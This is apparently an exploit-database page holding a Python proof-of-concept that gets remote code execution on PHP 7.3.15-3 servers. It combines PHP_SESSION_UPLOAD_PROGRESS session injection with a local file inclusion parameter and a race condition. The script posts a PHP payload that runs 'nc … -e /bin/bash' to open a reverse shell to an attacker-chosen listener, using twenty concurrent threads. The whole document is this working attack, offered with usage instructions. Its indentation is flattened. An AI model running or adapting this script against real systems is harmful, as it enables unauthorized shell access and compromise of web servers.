PHP 7.3.15-3 PHP_SESSION_UPLOAD_PROGRESS Session Data Injection

PHP version 7.3.15-3 suffers from a PHP_SESSION_UPLOAD_PROGRESS session data injection vulnerability.


MD5 | c88e9682c0140b88e53745d1f1516e69

# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3
# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat

#!/usr/bin/python3
"""
Usage :

python3 poc.p <Target URL> <ListnerIP> <ListnerPORT>
python3 poc.py https://xyz.xyz 192.168.1.15 1337

"""
import requests
import threading
import datetime
import sys

x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds

def fuzz():
targetIP = sys.argv[1]
listnerIP = sys.argv[2]
listnerPORT = sys.argv[3]
global newDatetime
while True:
try:
if datetime.datetime.now() > newDatetime:
exit()
# proxies = {
# "http": "http://127.0.0.1:8080",
# "https": "https://127.0.0.1:8080",
# }
sessionName = "SiLvER"
url = targetIP
s = requests.Session()
cookies = {'PHPSESSID': sessionName}
files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
# You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies

except Exception as error:
print(error)
exit()
def main():
print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
threads = []
for _ in range(20):
t = threading.Thread(target=fuzz)
t.start()
threads.append(t)
for thread in threads:
thread.join

if __name__ == "__main__":
if len(sys.argv) < 4:
print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
print("\n(=) By SiLvER \n")
exit()
else:
main()


Related Posts